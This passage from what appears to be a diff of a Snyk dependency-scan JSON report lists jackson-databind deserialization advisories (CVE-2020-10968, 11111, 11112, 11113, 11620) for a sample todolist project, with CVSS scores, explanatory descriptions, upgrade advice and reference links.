dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2662)\n", - "epssDetails": { - "percentile": "0.81534", - "probability": "0.00775", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-10968" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-rf6r-2c4q-2vwg" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2020-03-26T17:09:01.709397Z", - "functions_new": [ - { - "version": [ - "[2.0.0,2.9.10.4)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-03-26T14:55:20Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2020-03-26T14:55:20Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:54.576513Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5", - "severityWithCritical": "high" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-561585", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.4)", - "[2.7.0,2.9.10.4)" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [ - "2.6.7.4", - "2.9.10.4" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[2.0.0,2.9.10.4)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/e2ba12d5d60715d95105e3e790fc234cfb59893d", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2670", - "title": "GitHub Issue" - }, - { - "url": "https://github.com/Al1ex/CVE-2020-11113", - "title": "PoC" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.8, - "modificationTime": "2024-03-11T09:50:18.889961Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:53:47.400473Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:58:21.749219Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:50:18.889961Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:47.400473Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to gadget `org.apache.openjpa.ee.WASRegistryManagedRuntime` (aka openjpa).\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/e2ba12d5d60715d95105e3e790fc234cfb59893d)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2670)\n- [PoC](https://github.com/Al1ex/CVE-2020-11113)\n", - "epssDetails": { - "percentile": "0.81603", - "probability": "0.00786", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-11113" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-9vvp-fxw6-jcxr" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2020-03-31T08:36:41.369827Z", - "functions_new": [ - { - "version": [ - "[2.0.0,2.9.10.4)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-03-31T06:16:36Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2020-03-31T06:16:36Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:47.400473Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5", - "severityWithCritical": "high" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-561586", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.4)", - "[2.7.0,2.9.10.4)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.6.7.4", - "2.9.10.4" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.9.10.4)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/c14c9f99ed030dbd1440129585f03440c8758a99", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2664", - "title": "GitHub Issue" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.8, - "modificationTime": "2024-03-11T09:44:29.297635Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:51:14.145935Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:58:57.628835Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:44:29.297635Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:14.145935Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to gadgets `org.apache.activemq.*` (aka activemq-jms, activemq-core, activemq-pool, and activemq-pool-jms).\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/c14c9f99ed030dbd1440129585f03440c8758a99)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2664)\n", - "epssDetails": { - "percentile": "0.81603", - "probability": "0.00786", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-11111" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-v3xw-c963-f5hc" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2020-03-31T09:28:18.821103Z", - "functions_new": [ - { - "version": [ - "[,2.9.10.4)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-03-31T06:16:37Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2020-03-31T06:16:37Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:51:14.145935Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5", - "severityWithCritical": "high" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-561587", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.4)", - "[2.7.0,2.9.10.4)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.6.7.4", - "2.9.10.4" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.9.10.4)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/05d7e0e13f43e12db6a51726df12c8b4d8040676", - "title": "GItHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2666", - "title": "GitHub Issue" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.8, - "modificationTime": "2024-03-11T09:44:29.301384Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:51:14.113524Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:59:03.656527Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:44:29.301384Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:14.113524Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to gadget `org.apache.commons.proxy.provider.remoting.RmiProvider` (aka apache/commons-proxy).\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n## References\n- [GItHub Commit](https://github.com/FasterXML/jackson-databind/commit/05d7e0e13f43e12db6a51726df12c8b4d8040676)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2666)\n", - "epssDetails": { - "percentile": "0.81603", - "probability": "0.00786", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-11112" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-58pp-9c76-5625" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2020-03-31T09:29:29.728517Z", - "functions_new": [ - { - "version": [ - "[,2.9.10.4)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-03-31T06:16:37Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2020-03-31T06:16:37Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:51:14.113524Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5", - "severityWithCritical": "high" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-564887", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Tatu Saloranta" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.4)", - "[2.7.0,2.9.10.4)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.6.7.4", - "2.9.10.4" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.9.10.4)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2682", - "title": "GitHub Issue" - }, - { - "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", - "title": "Medium Post" - } - ], - "cvssDetails": [ - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:49:54.679784Z" - }, - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:50:17.073265Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:58:57.162608Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:49:54.679784Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:50:17.073265Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to `org.apache.commons.jelly.impl.Embedded` (aka `commons-jelly`).\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2682)\n- [Medium Post](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", - "epssDetails": { - "percentile": "0.92404", - "probability": "0.04399", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-11620" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-h4rc-386g-6m85" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2020-04-08T10:55:38.169333Z", - "functions_new": [ - { - "version": [ - "[,2.9.10.4)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-04-08T00:42:23Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2020-04-08T00:42:23Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:50:17.073265Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5", - "severityWithCritical": "high" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-564888", - "title": "Deserialization of Untrusted Data", - "CVSSv3": 